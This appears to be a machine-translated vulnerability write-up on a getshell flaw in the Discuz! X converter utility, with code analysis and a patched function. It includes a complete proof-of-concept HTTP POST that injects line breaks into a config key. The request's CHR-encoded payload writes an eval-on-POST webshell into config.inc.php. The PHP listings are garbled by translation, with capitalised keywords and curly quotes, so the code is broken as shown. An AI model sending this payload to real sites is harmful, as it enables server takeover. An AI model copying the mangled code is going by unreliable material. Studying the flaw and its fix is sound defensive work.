Directory
Vulnerability description
2. Vulnerability trigger conditions
3. The scope of the vulnerability
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking
1. Vulnerability description
For PHP applications, it is important to be in the user's input and correctly delimit the "data-code" boundary, which is used by hackers to inject "delimiters (format depending on the scene)" into the input data, which translates the input data into code that can be executed by the target system to achieve the purpose of code injection execution.
The root cause of this vulnerability is a newline (delimiter) in the code comment (input data) that causes code injection execution
Relevant Link:
http://p2j.cn/?p=357
http://loudong.360.cn/blog/view/id/15
http://www.2cto.com/Article/201402/278766.html
http://drops.wooyun.org/papers/929
2. Vulnerability Trigger Condition
1. /convert/include/global.func.php does not effectively filter the user's input data (non-numbers, letters, underscores cannot exist)
2. /convert/data/config.inc.php directory can be written
0x1: How to use it manually
http://localhost/discuz/utility/convert/index.php
http://localhost/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0
You can set the properties of the data in the start settings, and the post data is written directly to the config.inc.php file.
0X2:POC Automated test methods
POST /DZ2/convert/ HTTP/1.1 Host: 192.168.52.129 Proxy-Connection: keep-alive
Content-Length: 925 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3
Send this request directly Getshell, malicious code written to/convert/data/config.inc.php file
3. Vulnerability Impact Range
Full Discuz version
4. Vulnerability Code Analysis
\discuz\utility\convert\index.php
\discuz\utility\convert\include\do_config.inc.php
\discuz\utility\convert\include\global.func.php
Follow in this getvars () function
Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
Static $ks;
If($level == 0)
{
$ks = array();
$return = ‘‘;
}
Foreach ($array as $key => $val)
{
If($level == 0)
{
$newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
/*
Here is the key to generating vulnerabilities
1. DISCUZ's original intention is to use the key of the $config array as the "comment title" for each configuration area.
2. $newline written to the configuration file depends on $key, and $key is controllable by the attacker.
3. The correct boundary processing is not performed on the input data, causing the attacker to insert a newline character into the input data, escaping the scope of the annotation, thereby converting the input data into executable code.
1) Line breaks
2) ?>
This type of delimiter can achieve the same effect.
*/
$return .= "\r\n// $newline //\r\n";
}
$ks[$level] = $ks[$level - 1]."[‘$key‘]";
If(is_array($val))
{
$ks[$level] = $ks[$level - 1]."[‘$key‘]";
$return .= buildarray($val, $level + 1, $pre);
}
Else
{
$val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
$return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
}
}
Return $return;
}
5. Defense Methods
Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
Static $ks;
If($level == 0)
{
$ks = array();
$return = ‘‘;
}
Foreach ($array as $key => $val)
{
/ / Filter out non-letters, numbers and underscore characters in $key
$key = preg_replace("/[^\w]/", "", $key);
If($level == 0)
{
$newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
$return .= "\r\n// $newline //\r\n";
}
$ks[$level] = $ks[$level - 1]."[‘$key‘]";
If(is_array($val))
{
$ks[$level] = $ks[$level - 1]."[‘$key‘]";
$return .= buildarray($val, $level + 1, $pre);
}
Else
{
$val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
$return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
}
}
Return $return;
}
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
discuz! X upgrade/converter Getshell Vulnerability via/convert/include/global.func.php Inject special Symbol Into/convert/data /config.inc.php